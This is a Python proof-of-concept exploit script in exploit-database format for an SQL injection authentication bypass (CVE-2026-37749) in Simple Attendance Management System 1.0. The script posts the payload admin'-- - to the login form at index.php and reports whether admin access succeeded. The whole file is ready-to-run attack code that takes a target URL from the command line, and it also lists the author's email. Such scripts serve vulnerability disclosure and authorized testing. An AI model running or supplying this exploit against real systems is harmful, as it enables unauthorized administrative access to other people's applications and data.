#!/usr/bin/env python3
# Exploit Title: Simple Attendance Management System 1.0 - SQLi Authentication Bypass
# Date: 2026-04-16
# Exploit Author: Varad AP Mene (menevarad007@gmail.com)
# Vendor Homepage: https://codeastro.com/simple-attendance-management-system-in-php-with-source-code/
# Software Link: https://codeastro.com/simple-attendance-management-system-in-php-with-source-code/
# Version: 1.0
# Tested on: Windows 10 / XAMPP, Kali Linux
# CVE: CVE-2026-37749

import requests
import argparse
import sys

def exploit(base_url):
    url = f"{base_url}/index.php"
    payload = "admin'-- -"

    data = {
        'username': payload,
        'password': 'anything',
        'type': 'admin',
        'submit': 'submit'
    }

    session = requests.Session()
    session.headers.update({'User-Agent': 'Mozilla/5.0'})

    print(f"[*] Target  : {url}")
    print(f"[*] Payload : {payload}")
    print(f"[*] Sending request...")

    r = session.post(url, data=data, timeout=10, allow_redirects=True)

    if 'dashboard' in r.url or 'logout' in r.text.lower():
        print(f"[+] SUCCESS! Authentication bypassed!")
        print(f"[+] Redirected to: {r.url}")
        return True
    else:
        print(f"[-] Failed. Status: {r.status_code}")
        return False

def main():
    parser = argparse.ArgumentParser(
        description='CVE-2026-37749 - SQLi Auth Bypass PoC'
    )
    parser.add_argument('--url', required=True,
                        help='Target URL e.g. http://192.168.1.1/attendance')
    args = parser.parse_args()

    print("=" * 60)
    print("CVE-2026-37749 — SQLi Authentication Bypass")
    print("Product: Simple Attendance Management System 1.0")
    print("Author : Varad AP Mene")
    print("=" * 60)
    print()

    try:
        result = exploit(args.url.rstrip('/'))
        sys.exit(0 if result else 1)
    except Exception as e:
        print(f"[-] Error: {e}")
        sys.exit(1)

if __name__ == '__main__':
    main()